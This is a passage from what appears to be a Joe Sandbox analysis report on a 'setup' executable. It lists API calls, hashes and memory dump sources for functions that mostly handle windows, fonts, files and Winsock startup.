• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Color$Brush
• String ID:
• API String ID: 2798902688-0
• Opcode ID: f27b13f8a1b7bfdff1764e76b078473c5372e96abe7f257b1a5552f77900474a
• Instruction ID: 6ad01a2aab6db03b020a2c41b979f519469709e228d8b1d53dda29d617d0dba6
• Opcode Fuzzy Hash: f27b13f8a1b7bfdff1764e76b078473c5372e96abe7f257b1a5552f77900474a
• Instruction Fuzzy Hash: 74F098729407009BD720AFB1AD4D74A7EA0BB08711F01492AF2868BAE4E7B7A041DF00
APIs
• CreateMutexW.KERNEL32(00000000,00000001,AFX_AUTOUPDATE_200405172224), ref: 00C19BCD
• GetLastError.KERNEL32 ref: 00C19BD9
• ReleaseMutex.KERNEL32(?), ref: 00C19BF1
• CloseHandle.KERNEL32(?), ref: 00C19BFD
• Sleep.KERNEL32(000001F4), ref: 00C19C0F
Strings
• AFX_AUTOUPDATE_200405172224, xrefs: 00C19BC4
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Mutex$CloseCreateErrorHandleLastReleaseSleep
                                                                                                                          • String ID: AFX_AUTOUPDATE_200405172224
                                                                                                                          • API String ID: 1326836876-1720553081
                                                                                                                          • Opcode ID: 29f2804ccf9a1c73c23753760f1500b39bcdbd3a5d11655355a857667fa6c54b
                                                                                                                          • Instruction ID: 9dcc1c1fff85a4aaa41111939849b2208da375c83538b4bd8f457be907ac3ca6
                                                                                                                          • Opcode Fuzzy Hash: 29f2804ccf9a1c73c23753760f1500b39bcdbd3a5d11655355a857667fa6c54b
                                                                                                                          • Instruction Fuzzy Hash: 9FE0E530645712EBF7205B71EC6DFAA36A5FB01712F10496AF05AD61E0CBB5A8809F60
APIs
• GetCPInfo.KERNEL32(00000002,00000000,00C09A5E,7FFFFFFF,00000002,00C85DD8,00000002,00000002,?,00000000,?,?,?,?,00000000,?), ref: 00C85BAE
• __freea.LIBCMT ref: 00C85D43
• __freea.LIBCMT ref: 00C85D49
• __freea.LIBCMT ref: 00C85D7F
• __freea.LIBCMT ref: 00C85D85
• __freea.LIBCMT ref: 00C85D95
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: __freea$Info
• String ID:
• API String ID: 541289543-0
• Opcode ID: 5bea27d19bd7ce6671cb202437407813c8b5992ea1aa1952362c4882bc8c022e
• Instruction ID: 3177d523e99060025639b28e7d1dfa0c956560978dd47540477a7650acf09c43
• Opcode Fuzzy Hash: 5bea27d19bd7ce6671cb202437407813c8b5992ea1aa1952362c4882bc8c022e
• Instruction Fuzzy Hash: 50711772900A05ABDF21BE54CD45FBF7BF9AF49318F28045AFC24A7281E7B59D009768
APIs
  • Part of subcall function 00C24D9B: GetDC.USER32(00000000), ref: 00C24DA7
  • Part of subcall function 00C24D9B: GetDeviceCaps.GDI32(00000000,00000058), ref: 00C24DB6
  • Part of subcall function 00C24D9B: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C24DC4
  • Part of subcall function 00C24D9B: ReleaseDC.USER32(00000000,00000000), ref: 00C24DD2
• MulDiv.KERNEL32(00000037,?,00000060), ref: 00C2517A
• GetWindowRect.USER32(00000000,?), ref: 00C251BA
• OffsetRect.USER32(?,?,00000000), ref: 00C251DF
• OffsetRect.USER32(?,00000000,?), ref: 00C2522A
• GetClientRect.USER32(00000000,?), ref: 00C2526E
• InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,00000001), ref: 00C252C3
  • Part of subcall function 00C2538C: EnumChildWindows.USER32(?,00C253C3,?), ref: 00C253B9
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Rect$CapsDeviceOffset$ChildClientEnumInvalidateReleaseWindowWindows
• String ID:
• API String ID: 2604121654-0
• Opcode ID: 869ed98bacbcc2223dac3a4691d771d536057b417ac584255f2cbcf98771367d
• Instruction ID: a3fa6c2b70f062f9b30d3df13a611d7397b2307229192db027a9c8ba88624bf9
• Opcode Fuzzy Hash: 869ed98bacbcc2223dac3a4691d771d536057b417ac584255f2cbcf98771367d
• Instruction Fuzzy Hash: 77514AB1A00619EFDB14CFA8D999FBFBBB5FF48304F104119E556A7690DB71AA00CB20
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C3A1EC
  • Part of subcall function 00C3E41C: __EH_prolog3_catch.LIBCMT ref: 00C3E423
• WSAStartup.WS2_32(00000101,?), ref: 00C3A231
• WSACleanup.WS2_32 ref: 00C3A280
• WSASetLastError.WS2_32(0000276C), ref: 00C3A28B
• WSACleanup.WS2_32 ref: 00C3A32B
• FreeLibrary.KERNEL32(?,00C3A346,?,00C3A346,00000198,00C19C45,00000000), ref: 00C3A334
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Cleanup$ErrorFreeH_prolog3_H_prolog3_catchLastLibraryStartup
• String ID:
• API String ID: 2958719020-0
• Opcode ID: 5d19d25c8baa5678d3ead6575b5d78804f0ebc5c1a6adfe304e74f32437d93b6
• Instruction ID: 896649fb9ab2c7fc67754a03a084723ac2b9e379338205f6f90cf6e9b49cc775
• Opcode Fuzzy Hash: 5d19d25c8baa5678d3ead6575b5d78804f0ebc5c1a6adfe304e74f32437d93b6
• Instruction Fuzzy Hash: D341F270B217129FEF64AFB1994979E76A0BF00710F008169F09ACB5D1DB75C9A0EB52
APIs
• GetFocus.USER32 ref: 00C3607F
  • Part of subcall function 00C2F2AF: UnhookWindowsHookEx.USER32(?), ref: 00C2F2D9
• IsWindowEnabled.USER32(00000000), ref: 00C360B5
• EnableWindow.USER32(00000000,00000000), ref: 00C360CD
• EnableWindow.USER32(00000000,00000001), ref: 00C3616E
• IsWindow.USER32(00000000), ref: 00C36175
• SetFocus.USER32(00000000,?,00000007,?,00000000), ref: 00C36180
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Window$EnableFocus$EnabledHookUnhookWindows
• String ID:
• API String ID: 2931672367-0
• Opcode ID: 99275d29f6ef4d8c03f08839e849a1f835ac2d5e7794376cfac52d5ec973d777
• Instruction ID: 6d4b96af6c6b98d8918c0bc9a29740e909cd37f857b47d26ba48e4b1040832ba
• Opcode Fuzzy Hash: 99275d29f6ef4d8c03f08839e849a1f835ac2d5e7794376cfac52d5ec973d777
• Instruction Fuzzy Hash: E9419C30710601FFDB09EFA4C899BADBBB5BF45304F058169F0198B2A2CB70A955EB91
APIs
• CreateFileW.KERNEL32(?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB,00000000,00000000), ref: 00C26E3D
• GetFileTime.KERNEL32(00000000,?,?,00000000,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00C26E74
• CompareFileTime.KERNEL32(?,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26E8D
• CompareFileTime.KERNEL32(?,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26EAB
• CompareFileTime.KERNEL32(00000000,D53E8000,?,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00C265DB), ref: 00C26EC9
• SetFileTime.KERNEL32(00000000,?,?,00000000,?,00000180,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00C26EF1
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$Time$Compare$Create
• String ID:
• API String ID: 440986303-0
• Opcode ID: 728770ace4bbab7a0f90415b964c130a56de1dc23d4edaa5eef2322ec763bd15
• Instruction ID: 292f0289d0512d0b64b62768274e38fc70b7ae7fde576205268d647d00f09f82
• Opcode Fuzzy Hash: 728770ace4bbab7a0f90415b964c130a56de1dc23d4edaa5eef2322ec763bd15
• Instruction Fuzzy Hash: 42210CB690122DAADF01DBE0E948EEFB7FCAB04744F114126E911E2540E731AF068BB0
APIs
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,00C08FAB,?,?,?), ref: 00C08ECC
• SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?), ref: 00C08EF8
• GetLastError.KERNEL32(?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?,?), ref: 00C08F03
• ReadFile.KERNEL32(00000000,?,?,?,00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?), ref: 00C08F19
• CloseHandle.KERNEL32(00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?), ref: 00C08F24
• CloseHandle.KERNEL32(00000000,?,00C08FAB,?,?,?,?,00000000,00000000,?,00000000,?,?,00C07E42,?,?), ref: 00C08F2D
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$CloseHandle$CreateErrorLastPointerRead
• String ID:
• API String ID: 2547090176-0
• Opcode ID: ac424d796723926d4ce28eccde7d4a3f45d5a31600de32b92f4660c058215f2a
• Instruction ID: 908836d3cb23a3c1b0ddaec02293fe98e3a088191c0ef3dc77c185afa25d22bb
• Opcode Fuzzy Hash: ac424d796723926d4ce28eccde7d4a3f45d5a31600de32b92f4660c058215f2a
• Instruction Fuzzy Hash: EA216B31200205AFDB148FA4DD8AB6E37AAFB55760F008619F562D61E0DB70AE55DA60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1044B
                                                                                                                            • Part of subcall function 00C2CF8A: __EH_prolog3.LIBCMT ref: 00C2CF91
                                                                                                                            • Part of subcall function 00C2CF8A: GetDC.USER32(00000000), ref: 00C2CFBD
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 00C1047B
                                                                                                                          • MulDiv.KERNEL32(?,00000000), ref: 00C1048A
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C104E8
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C104FF
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C1051C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFontIndirect$CapsDeviceH_prolog3H_prolog3_Object
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 130217458-0
                                                                                                                          • Opcode ID: 08e6d45fe23bb862c63f225e7f2a6305ef11049ac10dd32111fe855f69946d6b
                                                                                                                          • Instruction ID: bbb7ca5aaed240a0c37b2c7e89814692ec434b35f6d9a67eeef2b0b38e3112dd
                                                                                                                          • Opcode Fuzzy Hash: 08e6d45fe23bb862c63f225e7f2a6305ef11049ac10dd32111fe855f69946d6b
                                                                                                                          • Instruction Fuzzy Hash: DB31BF70A00259AADF14EFA0CC85BEEB379BF04304F00815AFA19AB191DB745E85EF65
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C22669
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C2268B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C2269F
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3E9
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3F6
                                                                                                                            • Part of subcall function 00C2D092: __EH_prolog3.LIBCMT ref: 00C2D099
                                                                                                                            • Part of subcall function 00C2D092: GetWindowDC.USER32(00000000,00000004,00000000,?,00000058,00C1C274), ref: 00C2D0C5
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6E4
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6F5
                                                                                                                          • GetSysColor.USER32(00000005), ref: 00C226CF
                                                                                                                            • Part of subcall function 00C2D048: __EH_prolog3.LIBCMT ref: 00C2D04F
                                                                                                                            • Part of subcall function 00C2D048: CreatePen.GDI32(?,?,?), ref: 00C2D070
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
                                                                                                                          • Rectangle.GDI32(?,?,?,?,?), ref: 00C2270E
                                                                                                                            • Part of subcall function 00C2D695: RestoreDC.GDI32(?,?), ref: 00C2D6AA
                                                                                                                            • Part of subcall function 00C2D695: RestoreDC.GDI32(?,?), ref: 00C2D6C0
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C22720
                                                                                                                            • Part of subcall function 00C2D1E0: ReleaseDC.USER32(?,00000000), ref: 00C2D214
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientObject$H_prolog3RectRestoreSaveScreenSelectWindow$ColorCreateDeleteH_prolog3_RectangleRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 400067900-0
                                                                                                                          • Opcode ID: abe2c9ce52344f6a9cb13fc73a4aee1d51eb9ca55908bf02825052663b1eb65a
                                                                                                                          • Instruction ID: 57d29d171267f3a1c35077b744564d6bd14b4e019e5d4e72101cb370a6257d3f
                                                                                                                          • Opcode Fuzzy Hash: abe2c9ce52344f6a9cb13fc73a4aee1d51eb9ca55908bf02825052663b1eb65a
                                                                                                                          • Instruction Fuzzy Hash: 76312971D0021DAFDF00EFA4EC89AEDBB79BF24304F104218F812A65A2DB716A45DB10
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00C2E5CC
                                                                                                                          • GetParent.USER32(00000000), ref: 00C2E5DA
                                                                                                                          • GetParent.USER32(00000000), ref: 00C2E5F1
                                                                                                                          • GetLastActivePopup.USER32(00000000), ref: 00C2E604
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00C2E618
                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00C2E62B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 670545878-0
                                                                                                                          • Opcode ID: 80b97d20ebdd357268ee2e88e9d5d9756ed5171ad3d0d1c35a481d7069e7e651
                                                                                                                          • Instruction ID: c61e0c030026c682873b1236e297b2430fff232369c05383bae3d35e42ba640a
                                                                                                                          • Opcode Fuzzy Hash: 80b97d20ebdd357268ee2e88e9d5d9756ed5171ad3d0d1c35a481d7069e7e651
                                                                                                                          • Instruction Fuzzy Hash: AF1108326152359BC7315B55B848B6E73A87F64F68B190136FC15F7B48EB20DE0082D0
                                                                                                                          APIs
                                                                                                                          • IsWindow.USER32(00000400), ref: 00C229A2
                                                                                                                          • GetFocus.USER32 ref: 00C229C8
                                                                                                                          • GetParent.USER32 ref: 00C229E2
                                                                                                                          • IsWindow.USER32(?), ref: 00C229F7
                                                                                                                          • GetWindowRect.USER32(00000400,?), ref: 00C22A0F
                                                                                                                            • Part of subcall function 00C2D7AA: ScreenToClient.USER32(?,?), ref: 00C2D7B9
                                                                                                                            • Part of subcall function 00C2D7AA: ScreenToClient.USER32(?,00000000), ref: 00C2D7C6
                                                                                                                          • RedrawWindow.USER32(00000400,00000000,00000000,00000501), ref: 00C22A43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ClientScreen$FocusParentRectRedraw
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3242756796-0
                                                                                                                          • Opcode ID: 63d7d8ef49248f61057b55f531a196515441a5669de7c2e8fddd06fa4d1ae694
                                                                                                                          • Instruction ID: a2c081f049ddb41ab1ccba303b504d21d8c0308844681d09f4c637e38fc8c3d0
                                                                                                                          • Opcode Fuzzy Hash: 63d7d8ef49248f61057b55f531a196515441a5669de7c2e8fddd06fa4d1ae694
                                                                                                                          • Instruction Fuzzy Hash: 95219331910715FBDB319B74DC0ABAEBAB9BF04711F11021AF582E29A1EB70D950DB90
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,00C6FD3E,00C6D738,00C47D0D), ref: 00C6FD55
                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C6FD63
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C6FD7C
                                                                                                                          • SetLastError.KERNEL32(00000000,00C6FD3E,00C6D738,00C47D0D), ref: 00C6FDCE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3852720340-0
                                                                                                                          • Opcode ID: 2398dfca4fe271cdce856242bf517665abb4843f975ea3397568e2d31c37ed08
                                                                                                                          • Instruction ID: ee8935d97d98ad9e948cd6c7c9d95f2c2c8708501b34d14d55ec14297780fee7
                                                                                                                          • Opcode Fuzzy Hash: 2398dfca4fe271cdce856242bf517665abb4843f975ea3397568e2d31c37ed08
                                                                                                                          • Instruction Fuzzy Hash: 6E01843221D311AEE7342AB5BCC5F2E2A5AEB01774730423EF538450E1EF526C466685
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00C3D5A8
                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00C3D5B3
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00C3D5C3
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00C3D5DC
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00C3D5EC
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00C3D5F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1315500227-0
                                                                                                                          • Opcode ID: 53d5ecfffa1b8abf4f883402728642c97eafcbb20908439d359c6243c34a948b
                                                                                                                          • Instruction ID: cec2c1635ed4c17963d011ecc199d9eb54ea981d0db8fd94f6f10bd6803f4069
                                                                                                                          • Opcode Fuzzy Hash: 53d5ecfffa1b8abf4f883402728642c97eafcbb20908439d359c6243c34a948b
                                                                                                                          • Instruction Fuzzy Hash: E701807190111AABDB11DF649C0CFEE7778AF19318F514226F812EA190DB34DB458BA1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C6CCB0: TlsAlloc.KERNEL32(00C6CBC5,00C5AF75,00C4E28E,00C59C5C,?,00000000,?,00C59C43,?,?,00000000,00000000,?,00C5504F,00000000,?), ref: 00C6CCCC
